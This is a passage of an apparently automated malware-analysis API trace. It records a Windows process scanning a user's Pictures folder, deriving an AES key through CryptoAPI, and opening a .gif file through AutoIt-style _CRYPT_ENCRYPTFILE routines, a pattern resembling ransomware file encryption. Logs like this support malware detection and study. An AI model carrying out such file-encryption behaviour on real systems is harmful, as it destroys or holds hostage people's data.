lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.438] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.438] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0189.438] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.438] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.438] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.438] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.438] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.438] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.438] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.438] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b16250, ftCreationTime.dwHighDateTime=0x1d5dbf8, ftLastAccessTime.dwLowDateTime=0xb6ccdc90, ftLastAccessTime.dwHighDateTime=0x1d5e322, ftLastWriteTime.dwLowDateTime=0xb6ccdc90, ftLastWriteTime.dwHighDateTime=0x1d5e322, nFileSizeHigh=0x0, nFileSizeLow=0x77e4, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Lu YE0Otm8F.gif", cAlternateFileName="LUYE0O~1.GIF")) returned 0x90af58 [0189.438] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0189.438] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.439] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.439] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.439] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.439] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0189.439] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.439] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0189.440] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.440] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.440] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0189.440] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.440] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.440] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.440] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.440] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.440] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0189.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.440] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0189.441] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.441] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.441] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0189.441] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.441] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.441] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.441] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.441] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.441] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.441] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.441] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.441] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.442] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.442] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.442] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.442] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0189.442] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.442] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.442] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.442] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.442] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.442] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.442] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.442] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.442] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.442] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.442] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.442] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.442] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.442] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.442] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.442] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.442] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.442] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.443] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.443] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0189.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.443] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0189.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.443] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.443] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.443] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.443] CryptHashData (hHash=0x90ae18, pbData=0x8dec18, dwDataLen=0x19, dwFlags=0x1) returned 1 [0189.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.443] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.443] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.443] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.443] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.443] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.444] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0189.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.444] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.444] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0189.444] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.444] CryptDestroyHash (hHash=0x90ae18) returned 1 [0189.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.444] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.445] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.445] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.445] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\lu ye0otm8f.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.446] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.446] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0189.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0189.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0189.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0189.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0189.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0189.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.446] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0189.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0189.447] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0189.447] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0189.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0189.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0189.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0189.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0189.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 